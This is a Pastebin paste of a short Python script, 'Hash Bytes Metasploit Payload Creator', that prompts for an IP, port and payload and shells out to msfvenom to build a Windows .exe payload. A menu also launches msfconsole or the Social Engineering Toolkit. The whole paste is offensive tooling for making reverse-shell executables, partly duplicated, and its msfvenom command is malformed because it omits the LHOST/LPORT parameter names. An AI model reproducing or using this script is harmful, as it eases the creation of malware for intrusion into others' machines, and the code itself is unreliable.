Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # DO not take credit for this!
- import subprocess
- # Hash Bytes Metasploit Payload Creator!
- prompt = "hashbyte~# "
- ip = raw_input(prompt + "Please enter your ip: ")
- port = raw_input(prompt + "Please enter your listening port: ")
- payload = raw_input(prompt + "Please enter your payload: ")
- dir = raw_input(prompt + "Please enter a directory with file name included at end: ")
- main = "msfvenom -p " + payload + " " + ip + " " + port + " -f exe > " + dir
- print("[!] Creating Payload...")
- subprocess.call(main,shell=True)
- print("[!] Opening Port...")
- import subprocess
- msf = "msfconsole"
- pay = "payload"
- tool = "setoolkit"
- opt = raw_input("{tools} For the Social Engineering Toolkit\n{msf} for msfconsole\n{payload} for automatic setup of a shell!\nhasbyte~#")
- if opt == 'tools':
- subprocess.call(tool,shell=True)
- elif opt == 'msf':
- subprocess.call(msf,shell=True)
- elif opt == 'payload':
- # Hash Bytes Metasploit Payload Creator!
- prompt = "hashbyte~# "
- ip = raw_input(prompt + "Please enter your ip: ")
- port = raw_input(prompt + "Please enter your listening port: ")
- payload = raw_input(prompt + "Please enter your payload: ")
- dir = raw_input(prompt + "Please enter a directory with file name included at end: ")
- main = "msfvenom -p " + payload + " " + ip + " " + port + " -f exe > " + dir
- print("[!] Creating Payload...")
- subprocess.call(main,shell=True)
- print("[!] Opening Port...")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement